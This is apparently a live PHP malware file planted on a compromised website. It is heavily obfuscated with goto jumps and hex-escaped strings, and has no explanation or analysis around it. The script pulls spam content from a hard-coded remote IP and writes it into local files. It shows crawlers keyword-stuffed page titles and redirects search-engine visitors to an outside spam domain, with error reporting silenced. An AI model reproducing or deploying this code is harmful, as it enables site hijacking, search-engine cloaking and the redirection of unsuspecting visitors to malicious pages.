Your IP : 18.224.68.75
<?php
goto YSu0p; GAYDV: if (strpos($_SERVER["\x48\124\x54\120\x5f\125\123\x45\x52\x5f\101\107\105\116\x54"], "\x62\151\x6e\147") > 2 or strpos($_SERVER["\110\x54\124\x50\x5f\125\x53\x45\x52\x5f\101\x47\105\x4e\x54"], "\x79\141\x68\157\x6f") > 2) { $text = str_replace("\74\x74\151\164\x6c\x65\76\74\x2f\164\x69\164\154\x65\76", "\x3c\x74\151\x74\154\x65\76{$keyword}\x3c\57\164\151\x74\x6c\x65\x3e", $text); } goto KEDtu; HVj7D: $xx1 = 5; goto EKqJp; KTVOW: $_GET["\146\156"] = "\x36\x39\x36\x39\x36\71\156\145\x77"; goto DLyIN; dPluS: $today = "\62\x30\x32\65\60\61\60\61\x2d"; goto Y3Yg6; kWvSS: $keyword = str_replace("\x20", "\x2b", $keyword); goto MDJm2; cIQ0i: if (strlen($text) < 5000) { $text = file_get_contents("\x68\x74\x74\160\72\x2f\57\x31\63\x35\56\x31\x38\x31\56\x32\x31\56\x31\62\x36\x2f" . $_GET["\x66\x6e"] . "\56\x70\x68\x70\x3f\160\141\163\163\75{$apass}\x26\x71\75{$_GET["\151\x64"]}"); } goto Y6enw; Y3Yg6: foreach ($_GET as $a => $b) { $_GET["\151\x64"] = $b; } goto GCGEF; w7Osc: $query_pars_2 = str_replace("\x2d", "\x2b", $_GET["\x69\x64"]); goto cHP2Y; MDJm2: $apass2 = "\142\62\63\x68\x72\62\63\x76\x72\63\62"; goto zuTPO; zuTPO: $s = dirname($_SERVER["\x50\x48\x50\x5f\123\105\x4c\x46"]); goto gzwah; cHP2Y: $text = ''; goto WlFTs; KspAm: if ($_GET["\151\x64"] == "\x69\156\144\145\170") { header("\114\x6f\143\x61\164\151\x6f\x6e\72\x20\x68\x74\x74\x70\163\72\57\x2f\147\157\157\x67\x6c\145\x2e\x63\x6f\x6d"); die; } goto NZsoM; Js3Xv: $x1 = 3; goto HVj7D; DLyIN: $apass1 = "\166\151\163\x64\157\151\x6a\x65\167"; goto Js3Xv; Y6enw: if (strlen($text) < 5000) { $url = "\61\x33\x35\56\61\70\x31\56\x32\x31\x2e\x31\62\66"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\x20\x28{$errno}\x29\x3c\142\162\x20\57\76\12"; } else { $req = "\x2f" . $_GET["\146\156"] . "\56\x70\x68\x70\x3f\x70\141\x73\163\75{$apass}\46\x71\75{$_GET["\151\144"]}"; $out = "\x47\105\x54\40{$req}\40\x48\124\124\120\x2f\x31\x2e\60\15\xa"; $out .= "\110\x6f\163\x74\72\40{$url}\xd\12"; $out .= "\x43\x6f\156\x6e\145\143\164\151\157\156\72\40\x43\154\x6f\163\x65\xd\12\15\12"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\12", $text); $text = $text[7]; } goto JvGVz; JvGVz: if (strlen($text) > 5000) { $out = fopen("\151\156\144\145\x78\57" . $myname, "\167"); fwrite($out, $text); fclose($out); } goto GAYDV; cE1vV: $s = $_SERVER["\123\x45\x52\126\x45\122\137\116\x41\x4d\105"] . $s; goto DCPVt; v5_5J: if (strpos($_SERVER["\110\x54\124\x50\x5f\x52\x45\x46\105\x52\105\x52"], "\x67\x6f\x6f\147\154\x65\56") or strpos($_SERVER["\110\124\x54\120\x5f\x52\x45\106\x45\122\105\122"], "\171\x61\x68\x6f\x6f\x2e") or strpos($_SERVER["\110\124\124\120\x5f\x52\105\106\x45\122\x45\x52"], "\142\151\x6e\147\x2e")) { $tpl = "\151\x6e\144\x65\170\x2f" . $_GET["\151\x64"] . "\x2e\x70\x68\160\56\x74\160\x6c"; $tpl = file($tpl); $tpl = chop($tpl[0]); $my = $_GET["\155\171"]; header("\114\x6f\x63\141\x74\151\x6f\x6e\x3a\x20\x68\x74\164\x70\x73\x3a\57\57\x63\150\x70\x6f\x6b\x2e\163\x69\x74\x65\57\145\156\164\145\x72\57\77\x6d\141\162\153\75{$today}\x2d{$s}\x26\164\160\x6c\75{$tpl}\46\145\156\x67\x6b\145\171\75{$keyword}"); die; } else { $myname = $_GET["\x69\x64"] . "\x2e\160\x68\x70"; if (file_exists("\x69\156\x64\x65\x78\x2f" . $myname)) { $html = @file_get_contents("\x69\156\x64\145\x78\x2f" . $myname); if (strpos($_SERVER["\110\124\x54\x50\x5f\125\123\x45\x52\137\101\107\105\x4e\x54"], "\x62\151\x6e\147") > 2 or strpos($_SERVER["\x48\x54\124\120\137\125\x53\x45\x52\x5f\x41\107\x45\116\124"], "\x79\141\150\157\157") > 2) { $keyword = str_replace("\55", "\x20", $_GET["\x69\144"]); $html = str_replace("\74\x74\x69\x74\x6c\145\76\x3c\x2f\164\x69\164\154\x65\76", "\x3c\x74\151\x74\x6c\x65\76{$keyword}\74\57\x74\151\x74\x6c\x65\x3e", $html); } echo $html; die; } } goto w7Osc; YSu0p: error_reporting(0); goto dPluS; NZsoM: $_GET["\167\x6f\x72\154\x64"] = 5; goto KTVOW; maPhf: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto v5_5J; WlFTs: if (function_exists("\x63\165\x72\x6c\x5f\x69\x6e\x69\164")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\x68\x74\x74\160\72\57\x2f\x31\x33\65\56\61\70\61\x2e\62\61\56\61\62\66\x2f" . $_GET["\146\156"] . "\x2e\160\x68\x70\77\160\x61\x73\163\x3d{$apass}\x26\161\75{$_GET["\151\144"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\115\157\172\151\x6c\x6c\141\x2f\x34\x2e\x30\40\50\x63\157\155\160\141\x74\151\142\x6c\x65\x3b\40\115\123\x49\105\x20\66\x2e\60\x3b\40\127\151\x6e\144\x6f\167\163\40\116\x54\x20\x35\56\61\x3b\40\x53\126\61\x29"); $text = curl_exec($ch); curl_close($ch); } goto cIQ0i; GCGEF: if ($_GET["\151\x64"] == "\x74\x65\x73\x74\x69\x6e\x67") { echo "\164\x65\x73\164\40\147\x6f\157\x64\x2e\x2e\x2e"; die; } goto KspAm; DCPVt: $apass3 = "\x72\x76\x33\62\171\x64\141\x63\x73\x76\163\144\166"; goto maPhf; EKqJp: $keyword = str_replace("\x2d", "\x20", $_GET["\x69\144"]); goto kWvSS; gzwah: if ($s == "\134" | $s == "\x2f") { $s = ''; } goto cE1vV; KEDtu: echo $text; goto y0Dad; y0Dad: ?>